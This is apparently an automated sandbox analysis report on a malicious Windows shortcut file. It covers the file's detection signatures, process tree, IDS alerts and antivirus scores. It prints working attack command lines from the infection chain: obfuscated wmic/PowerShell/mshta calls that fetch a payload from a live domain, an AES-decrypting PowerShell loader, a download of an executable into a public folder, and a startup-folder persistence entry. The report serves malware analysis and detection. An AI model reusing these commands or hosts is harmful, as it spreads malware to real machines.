
Windows Analysis Report
n5Szx8qsFB.lnk

Overview

General Information

Sample name: n5Szx8qsFB.lnk (renamed because original name is a hash value)
Original sample name: a1cfce4d0ce44d183b7c9c5bbce9d8f5.lnk
Analysis ID: 1581249
MD5: a1cfce4d0ce44d183b7c9c5bbce9d8f5
SHA1: f5f7d71c40e07bb97f55754f920879f05747754e
SHA256: be673f7be053fa7deb72a5e592c48c2acfc2f6f31c5c5aeaaf03602419aa00e9
Tags: lnk, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • WMIC.exe (PID: 7716 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7832 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 8084 cmdline: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 7508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 4520 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 5272 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 4832 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1584,i,8641109857703384737,8271461273470373674,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • XKIZdXAs.exe (PID: 7624 cmdline: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" MD5: 2A89603D2620B2A62113513709E38E95)
              • powershell.exe (PID: 4268 cmdline: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 8376 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 8384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • Guard.exe (PID: 8628 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                  • cmd.exe (PID: 8644 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 8652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 8736 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 8788 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]
Rule: emmenhtal_strings_hta_exe
Description: Emmenhtal Loader string
Author: Sekoia.io
Strings:
  • 0x3c1cb:$char: = String.fromCharCode(Kk,dU,
  • 0x3c1c4:$var: var
  • 0x57c52:$eval: eval(
  • 0x3c04f:$script1: <script>
  • 0x57c48:$script1: <script>
  • 0x43c3f:$script2: </script>MZ
  • 0x57c6e:$script2: </script>MZ

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8376, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 8628, ProcessName: Guard.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" , ParentImage: C:\Users\user\AppData\Roaming\XKIZdXAs.exe, ParentProcessId: 7624, ParentProcessName: XKIZdXAs.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 8376, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 8628, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 8644, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2, CommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2, ProcessId: 8084, ProcessName: mshta.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" , ParentImage: C:\Users\user\AppData\Roaming\XKIZdXAs.exe, ParentProcessId: 7624, ParentProcessName: XKIZdXAs.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 8376, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" , ParentImage: C:\Users\user\AppData\Roaming\XKIZdXAs.exe, ParentProcessId: 7624, ParentProcessName: XKIZdXAs.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 4268, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA4250
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')", ProcessId: 7716, ProcessName: WMIC.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8736, ProcessName: wscript.exe
Source: File created; Author: Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4268, TargetFilename: C:\Users\Public\Guard.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA4250
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8736, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 8788, ProcessName: SwiftWrite.pif
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7508, TargetFilename: C:\Users\user\AppData\Roaming\XKIZdXAs.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" , ParentImage: C:\Users\user\AppData\Roaming\XKIZdXAs.exe, ParentProcessId: 7624, ParentProcessName: XKIZdXAs.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 4268, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" , ParentImage: C:\Users\user\AppData\Roaming\XKIZdXAs.exe, ParentProcessId: 7624, ParentProcessName: XKIZdXAs.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 4268, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8736, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 7716, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2'), ProcessId: 7832, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7256, ProcessName: svchost.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8644, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Timestamp                        SID      Severity  Classtype                Source IP      Source Port  Destination IP  Destination Port  Protocol
2024-12-27T09:05:26.683305+0100  2803305  3         Unknown Traffic          192.168.2.8    49711        147.45.49.155   443               TCP
2024-12-27T09:05:34.331279+0100  1810003  2         Potentially Bad Traffic  147.45.49.155  443          192.168.2.8     49722             TCP
2024-12-27T09:05:34.077266+0100  1810000  1         Potentially Bad Traffic  192.168.2.8    49722        147.45.49.155   443               TCP

AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1] ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe ReversingLabs: Detection: 34%
Source: n5Szx8qsFB.lnk Virustotal: Detection: 29%
Source: n5Szx8qsFB.lnk ReversingLabs: Detection: 21%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: unknown HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.1784385085.0000021D206B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764422929.0000021D206C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764242109.0000021D24760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D2467A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485794840.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763193876.0000021D2464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770484123.0000021D20748000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763663634.0000021D24632000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762308911.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784310747.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762170340.0000021D24760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764056549.0000021D20743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1785367870.0000021D206B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1795443084.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762170340.0000021D246C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765703418.0000021D245B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765157834.0000021D206B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768177432.0000021D24591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485863086.0000021D2466D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768320287.0000021D20744000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D24652000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763886260.0000021D26241000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764993316.0000021D2467E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486253359.0000021D2073E000.00000004.00000020.00020000.00000000.sdmp
